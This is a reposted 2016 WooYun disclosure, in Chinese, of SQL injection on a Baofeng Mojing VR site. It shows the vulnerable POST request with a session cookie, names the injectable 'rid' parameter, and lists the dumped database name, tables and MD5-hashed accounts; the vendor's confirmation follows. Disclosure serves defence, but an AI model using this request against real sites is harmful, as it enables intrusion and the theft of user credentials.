暴风魔镜某站存在SQL注入(涉及大量账号密码)

admin
admin
admin
139544
文章
114
评论
2017年4月28日05:32:46评论349 views字数 231阅读0分46秒阅读模式
摘要

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2016-204960

漏洞标题: 暴风魔镜某站存在SQL注入(涉及大量账号密码)

相关厂商: mojing.cn

漏洞作者: Aasron

提交时间: 2016-05-04 15:46

公开时间: 2016-06-18 16:40

漏洞类型: SQL注射漏洞

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: php+字符类型注射 Mysql 注射技巧

0人收藏

漏洞详情

披露状态:

2016-05-04: 细节已通知厂商并且等待厂商处理中
2016-05-04: 厂商已经确认,细节仅向厂商公开
2016-05-14: 细节向核心白帽子及相关领域专家公开
2016-05-24: 细节向普通白帽子公开
2016-06-03: 细节向实习白帽子公开
2016-06-18: 细节向公众公开

简要描述:

暴风魔镜某站存在SQL注入(涉及大量账号密码)

详细说明:

友情检测,求分

code 区域 
POST /List/vr/praise/ HTTP/1.1
 Host: vr360.mojing.cn
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: application/json, text/javascript, */*; q=0.01
 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
 Accept-Encoding: gzip, deflate
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
 Referer: http://vr360.mojing.cn/List/vr/picdetail?id=660
 Content-Length: 32
 Cookie: Hm_lvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462336535; Hm_lpvt_cc8bbd8fb148ffc25a2c9c951dd43040=1462342590; nTalk_CACHE_DATA={uid:kf_9686_ISME9754_3971414470516277,tid:1462336535057720}; NTKF_T2D_CLIENTID=guest31BD2928-36A8-EE57-E997-755687CC4B1E; user_regist_plat=1; PHPSESSID=f4seia83q3qpjjgsc3r037reb6; Hm_lvt_4f15bce7f77b74e9932fc896a915f5b8=1462344105; Hm_lpvt_4f15bce7f77b74e9932fc896a915f5b8=1462344113
 Connection: close
 
 rid=660&praise=0&resource_type=3
code 区域 
注入参数#rid
code 区域 
当前数据库用户:%
 当前数据库:mojing_bgc

漏洞证明:

code 区域 
acl_menu_url
  acl_permissions
  acl_resources
  acl_roles
  acl_roles_change
  acl_user_to_role
  acl_users
  bgc_ad
  col_info
  company
  company_data_join
  company_join_change
  country
  email_remind
  manager_page
  mode_class_manager
  mode_config
  navigation_manager
  news
  news_class
  pic_pano
  pic_pano_task
  region
  res_class
  res_label
  res_lc_link
  resource_col_info
  resource_download
  resource_love
  resource_manager
  resource_offline
  resource_stat
  resource_stat_data
  resource_status
  resource_support
  resource_sync_cms
  users_baseinfo
  users_info_ext
  video_hot
  video_manager

不知道是否是内部的账号,登录ip显示为内网

暴风魔镜某站存在SQL注入(涉及大量账号密码)

暴风魔镜某站存在SQL注入(涉及大量账号密码)

md5加密方式

修复方案:

过滤

版权声明:转载请注明来源 Aasron@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-05-04 16:34

厂商回复:

感谢您提交的漏洞,我们会尽快修复。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-05-04 15:52 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:511 | 哥,是孤独风中的一匹狼)

    0

    大表哥好使 牛逼

  2. 2016-05-04 22:02 | 白骨夫人 ( 普通白帽子 | Rank:248 漏洞数:56 | 白骨夫人,白只做白的,骨就是骨气,夫人就...)

    0

    你也好牛逼啊

  3. 2016-06-18 16:54 | 开心宝贝 ( 路人 | Rank:12 漏洞数:8 | 我唤醒大海,唤醒山脉,我唤醒沙漠,处处充...)

    0

    大表哥好6

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin